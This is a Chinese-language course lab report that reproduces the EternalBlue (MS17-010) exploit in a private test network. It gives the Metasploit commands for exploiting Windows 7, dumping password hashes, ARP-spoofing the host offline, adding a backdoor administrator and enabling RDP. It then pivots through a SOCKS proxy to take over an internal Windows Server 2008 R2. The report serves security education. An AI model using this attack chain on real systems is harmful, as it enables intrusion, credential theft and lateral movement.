跳转至

信息安全导论

1118 个字 预计阅读时间 4 分钟

永恒之蓝

相关资料

Kali 环境配置
WIN7环境配置
win serve 2012环境配置

问题一
开启3389端口
问题二
附加功能

永恒之蓝是非常经典的漏洞,请同学们自行搭建永恒之蓝的测试环境,复现永恒之蓝漏洞,(可能需要用到metasploit),该作业需要上交漏洞复现报告,具体有以下要求:
(1)网络中存在攻击机A,靶机B(存在永恒之蓝漏洞)。A利用漏洞控制B
(2)若靶机B的内网存在服务器C,请你将靶机B作为跳板攻击服务器C(攻击机A无法直接访问服务器C,需要通过B来攻击C)

起始配置

各主机 IP

  • kali 192.168.226.130
  • windows7(x64) 192.168.226.129 192.168.247.129
  • windows server 2008 R2(x64) :192.168.247.130

Kali windows 上分别利用ifconfigipconfig查看主机 IP 地址

image-20241207183833601

环境配置

windows 防火墙与自动更新关闭

image-20241207183839443

kali 攻击 windows7

进行攻击

首先通过msfconsole打开 msf 功能

msfconsole

image-20241207184609461

然后搜索 ms17-010 脚本

search ms17-010

image-20241207184306525

对靶机进行扫描,信息收集

use auxiliary/scanner/smb/smb_ms17_010
show options

image-20241207184732415

接下来配置靶机 IP 信息,并运行

set rhosts 192.168.226.129
run

image-20241207184830056

exploit切换到攻击模块,并配置靶机 IP,运行

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.226.129
run

image-20241207185012776

利用hashdump查看靶机的用户名与密码

hashdump

image-20241207185619998

利用shell登录到靶机的 Terminal 界面

shell

image-20241207185726507

即可以看到,永恒之蓝攻击成功

利用漏洞进行操作

kali 上传图片到靶机

upload /home/kali/Desktop/1.jpg c:\\

image-20241207185914088

结果如下图所示,可以看到已经上传到 windows7 的系统中

image-20241207190034335

利用 ARP 攻击靶机使其断网

sudo arpspoof -i etho -t 192.168.226.129 192.168.226.2

image-20241207190419703

结果如下图所示,可以看到红框所在网络已经断连

image-20241207190349321

远程桌面登录

在上面 kali 已经进入 windows7 shell 的基础上,开启 3389 远程桌面端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看端口是否开启

netstat -an

image-20241207190836998

创建新用户,并为其添加管理员权限

net user hack 123123 /add
net localgroup administrators hack /add

image-20241207190950244

然后利用新建的用户远程登陆 windows7 系统

rdesktop 192.168.112.128

image-20241207191046631

跳板攻击内网服务器

利用 win7 开启路由

开启 MSF

msfconsole 

image-20241211000025577

攻击 win7,并进入 meterpreter

设置启用永恒之蓝攻击模块

 use exploit/windows/smb/ms17_010_eternalblue 

image-20241211000128700

设置攻击 ip 192.168.226.129

set rhosts 192.168.226.129 

image-20241211000153542

run/exploit 命令开始攻击

run

image-20241211000230630

已经攻击成功

route 指令可以看到 win7 的网段 有 192.168.226.0/24 192.168.247.0/24 两个网段。

route

image-20241211000301790

添加 192.168.247.0/24 的路由,给 Kali win server 建立通道

run autoroute -s 192.168.247.0/24

image-20241211000339195

background

退出 meterpreter, 转到后台运行

image-20241211000403060

打印路径,可以看到 192.168.247.0 在后台运行

route print

image-20241211000437264

use auxiliary/server/socks_proxy

options

使用 sock 代理相关模块

image-20241211000518079

set version 5

set srvhost 127.0.0.1

show options

配置相关版本和攻击者 ip

image-20241211000626447

run

jobs

开始运行 sock 代理,jobs 可以看到正在运行的服务

image-20241211001046741

设置 SOCKS

sudo vim etc/proxychains4.conf 

配置里面的文件

最后改为

socks5 127.0.0.1 1080

image-20241211145535694

扫描 192.168.247.130windows server 2008 R2 ip445 端口

( 永恒之蓝攻击主要利用 445 139 端口 )

扫描可以看见端口 445 OK(说明 open

nmap -sT -Pn -p 445 192.168.247.130

image-20241210231558020

proxychains msfconsole

启用 MSF

image-20241210231656182

use auxiliary/admin/smb/ms17_010_command

用该模块在网段里搜索容易被 MS17-010 漏洞影响的 Windows 主机

image-20241210231843922

set rhosts 192.168.247.130

image-20241210231831010

set command + 指令

相当设定发给 rhosts ip 的指令,

run 运行发送

这里相当于发送 whoami windows server,返回系统用户名

set command whoami

run

image-20241210231917436

这个是新增用户 ( 不过这里没 run)

set command net user lyq djxlyq63 /add

image-20241210232146623

将新增的用户加到管理组 ( 不过这里没 run,参考第一问,为远程登录做准备 )

set command net localgroup administrators lyq /add

image-20241210232058221

这个是修改系统注册表信息,添加 fDenyTSConnections 变量,格式为 REG_DWORD , 值为 0,相当于开启远程登录,打开 3389 端口。

set command "reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f"

image-20241210232316845

run

image-20241210232344534

选用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_psexec

image-20241210232427300

选用攻击载荷

可以通过 show payloads 查看可以利用的载荷

set payload windows/meterpreter/bind_tcp

image-20241210232450815

运行

run

image-20241210232543261

进入终端

shell

image-20241210232619529

查看 ip

ipconfig

image-20241210232633157

查看系统信息

systeminfo

image-20241210232748734

Windows 操作系统中使用的命令行指令,它用于设置当前控制台的代码页为 UTF-8 编码,解决乱码问题

chcp 65001

image-20241210232859519

查看 windows server 2008 R2 CPU 信息

wmic cpu list brief

image-20241210233017604